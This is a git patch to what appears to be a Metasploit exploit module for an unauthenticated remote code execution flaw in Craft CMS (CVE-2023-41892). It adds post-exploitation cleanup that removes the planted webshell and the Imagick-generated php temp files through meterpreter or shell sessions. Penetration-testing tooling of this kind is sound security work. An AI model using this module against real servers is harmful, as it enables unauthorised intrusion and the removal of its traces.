From d00249f08349b8eb2c4d1c4af59d930deb5e173e Mon Sep 17 00:00:00 2001
From: h00die-gr3y <h00die.gr3y@gmail.com>
Date: Thu, 14 Dec 2023 12:57:07 +0000
Subject: [PATCH] Second release with manual cleanup of php* files

---
 .../craftcms_unauth_rce_cve_2023_41892.rb     | 27 ++++++++++++++++++-
 1 file changed, 26 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
index 588419578906..41ac6f9e1840 100644
--- a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
+++ b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
@@ -237,6 +237,32 @@ def execute_command(cmd, _opts = {})
     })
   end
 
+  def on_new_session(session)
+    # cleanup webshell in DOCUMENT_ROOT
+    register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")
+
+    # Imagick plugin generates a php<random chars> file with MSL code in the directory set by
+    # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.
+    # A manual cleanup procedure is required to identify and remove the php* files when the session is established.
+    if session.type == 'meterpreter'
+      session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)
+      clean_files = session.fs.dir.entries
+      unless clean_files.nil? || clean_files.empty?
+        clean_files.each do |f|
+          register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/php+/)
+        end
+      end
+    else
+      clean_files = session.shell_command_token("ls #{@config['upload_tmp_dir']}/php*")
+      unless clean_files.nil? || clean_files.empty?
+        clean_files.split(' ').each do |f|
+          register_files_for_cleanup(f.to_s)
+        end
+      end
+    end
+    super
+  end
+
   def check
     check_phpinfo
     return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
@@ -249,7 +275,6 @@ def exploit
     check_phpinfo unless datastore['AutoCheck']
     fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
     fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell
-    register_files_for_cleanup(@webshell_name.to_s)
 
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']